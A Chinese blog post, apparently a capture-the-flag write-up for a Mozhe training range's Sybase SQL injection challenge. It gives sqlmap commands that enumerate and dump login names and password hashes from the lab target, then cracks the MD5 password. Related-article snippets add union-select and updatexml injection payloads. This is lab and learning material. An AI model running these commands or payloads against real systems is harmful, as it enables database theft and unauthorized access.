SQL手工注入漏洞测试(Sybase数据库)

最新推荐文章于 2024-03-12 18:33:28 发布
最新推荐文章于 2024-03-12 18:33:28 发布
阅读量1.1k 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36933272/article/details/100503637
版权

打开sqlmap,输入地址进行爆破

查找数据库sqlmap -u “http://219.153.49.228:41333/new_list.php?id=1” --dbs --batch

查找表 sqlmap -u “http://219.153.49.228:41333/new_list.php?id=1” -D mozhe_Deepthroat --tables --batch

查找列sqlmap -u “http://219.153.49.228:41333/new_list.php?id=1” -D mozhe_Deepthroat -T Deepthroat_login --columns --batch

查找字段sqlmap -u “http://219.153.49.228:41333/new_list.php?id=1” -D mozhe_Deepthroat -T Deepthroat_login -C name,password --dump --batch

得到name和密码
在这里插入图片描述
选第一个登陆,密码md5解密,得到key

在这里插入图片描述

qq_36933272
关注
墨者_SQL手工注入漏洞测试(Sybase数据库)
weixin_50698958的博客
10-23 741
靶场: https://www.mozhe.cn/bug/detail/b0R2Q0VJL3lnellUMjJoUmRsK1FsZz09bW96aGUmozhe 背景介绍 安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Apache+PHP+Sybase,PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。 实训目标 1.掌握SQL注入原理; 2.了解手工注入的方法; 3.了解Sybase的数据结构; 4.了解字符串的MD5加解密; 解题方向 手工进行
刷题笔记:SQL手工注入漏洞测试(Sql Server数据库
m0_67399862的博客
03-26 925
进入网页后,用and语句来判断是否有注入点,当输入and 1=2时,页面报错,而输入and 1=1时,页面恢复,说明可能存在注入点 用order by 语句来判断字段数,因为order by5时页面报错,而order by4时页面没有报错,则说明该字段数为4 用union select语句,但页面报错,网页不兼容,则上网查了查,需要用union all select 但页面仍然报错,考虑字符串的问题,后面的数字逐个加单引号试,直至页面不报错 然后将2的位置换为d...
SQL手工注入漏洞测试(Sql Server数据库)
qq_36933272的博客
08-31 413
寻找注入点 and 1=1 ,and 2=1 判断字段 order by N# 虽然3报错,但4有回显。判断是4个字段 查看回显位置id=2 and 2=1 union all select 1,2,‘3’,4# 查询数据库id=2 and 2=1 union all select 1,2,db_name(),4# 查询表 id=2 and 2=1%20 union all select 1,(s...
墨者学院-入门级-SQL注入漏洞测试(布尔盲注)-小白必看(超详细)
kitiu666的博客
08-26 4199
2020年8月25日,第五次渗透测试。 通过对sql语句进行注入数据库的库名,表名,字段进步爆破,最终获得key。 准备需求: 1.windows系统pc 2.2.burpsuite(bp)抓包软件 3.sqlmap sql 数据库的爆破工具 1.进入靶场 ...
基于报错的注入模式
WYJ____的博客
07-26 603
updatexml函数   基于报错的注入一般bu'z步骤 1.求闭合字符;2.爆数据库名;3.爆表名;4.爆列名;5.爆字段名。     求库名 ?id=1’ and updatexml(1,concat(0x23,database()),1)%23 求表名 ?id=1' and updatexml(1,concat(0x23,(select group_concat(ta...
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
宽字节注入SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞测试(Access数据库)、SQL手工注入漏洞测试(PostgreSQL数据库)、SQL手工注入漏洞测试(MongoDB数据库)、SQL...
SQL注入(不同数据库之间)
qi_SJQ_的博客
11-08 1268
简要学习各种数据库注入特点: 数据库:Access, mysql ,mssql(sql server) mongoDB, postgresql, sqlite,oracle, sybase等。 工具:Sqlmap, NoSQLAttack, Pangolin等。 其他数据库大体结构都相同,但access的数据库存在于asp网站内的一个文件夹下,不同网站对应不同数据库。 因此注入方式有所不同,不用注库名,而且没有access数据库没有文件读写功能等等特点。 故有以下结构: ...
数据库原理了解什么是sql注入
heibaikong6的博客
12-04 1009
文章目录数据库相关概念 数据库相关概念
渗透测试 ( 6 ) --- SQL 注入神器 sqlmap
墨鱼菜鸡
07-11 3103
sqlmap 官网:http://sqlmap.org/ sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage sqlmap 使用 思维导图:http://download.csdn.net/detail/freeking101/9887831 黑帽与白帽都喜爱的十大SQL注入工具:...
360众测靶场题库之82- SQL手工注入漏洞测试(Sybase数据库)
最新发布
zjl12344的博客
03-12 187
360众测靶场题库
Sybase数据库测试工具
11-07
sybase测试,周期性监控表中数据的变化
x64_linux下Sybase ASE15.7(4之2)
11-27
Sybase ASE数据库最新版15.7, 64位linux版,可装于SuSE11, RedhatELS5.5, Ubuntu10.0.4 共4个包,这是第2个包
sybase inject paper
weixin_34403693的博客
01-06 111
14.3 Sybase内的MS SQL Server 注入技术 有大量的关于Microsoft SQL Server应用程序内SQL注入的文章被发表,这是因为Sybase 和MS SQL Server有共同的来源,值得快速研究一下这个著名的技术和其在Sybase内的工作方式。 14.3.1 注释 Sybase使用“--”和“/*”注释风格,这种方式与MS SQL...
Sybase内的MS SQL Server 注入技术
瞎几把学
06-06 2032
14.3 Sybase内的MS SQL Server 注入技术有大量的关于Microsoft SQL Server应用程序内SQL注入的文章被发表,这是因为Sybase 和MS SQL Server有共同的来源,值得快速研究一下这个著名的技术和其在Sybase内的工作方式。14.3.1 注释Sybase使用“--”和“/*”注释风格,这种方式与MS SQL Server非常一致,因此可以利
常见数据库漏洞
Fly_鹏程万里
12-16 1822
MySQL数据库 默认端口:3306 攻击方法:     爆破:弱口令     身份认证漏洞:CVE-2012-2122     拒绝服务攻击     Phpmyadmin万能密码绕过:用户名:‘localhost’@’@” 密码任意     提权 参考:     https://www.seebug.org/appdir/MySQL     http://www.waitalone.cn/m...
有关Sybase ASE数据库的几个问题的解答
iihero@CSDN
09-09 2109
论坛上有人问及,解答于此,全是个人理解,未免有偏颇。 1 数据库占用磁盘空间的形式是什么?Master数据库的作用是什么?如果master失败后果如何?   设备文件.                    存储系统表, 系统将无法使用, 除非重建master库 2 段的实质是什么?已被SYBASE中对象使用的段可否被删除?   对设备文件进行逻辑上的再划分。  当然不能删除。除非将对象正使用的段
墨者学院 - SQL手工注入漏洞测试(SQLite数据库)
多崎巡礼的博客
08-20 1720
  网站公告存在注入点   ip/new_list.php?id=1 and 1=2 union select 1,name,sql,4 from sqlite_master limit 0,1 ip/new_list.php?id=1 and 1=2 union select 1,name,password,4 from WSTMart_reg      ...
Oracle数据库注入-墨者学院(SQL手工注入漏洞测试(Oracle数据库))
T1ngSh0w的博客
09-08 1609
Oracle数据库注入-墨者学院-SQL手工注入漏洞测试(Oracle数据库)详细讲解
sql手工注入漏洞测试(mysql数据库)
06-28
SQL手工注入漏洞测试是一种常见的安全测试方法,主要针对MySQL数据库。通过手动输入恶意代码,测试系统是否存在SQL注入漏洞,以此来发现和修复系统的安全漏洞。这种测试方法需要有一定的技术水平和经验,同时也需要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值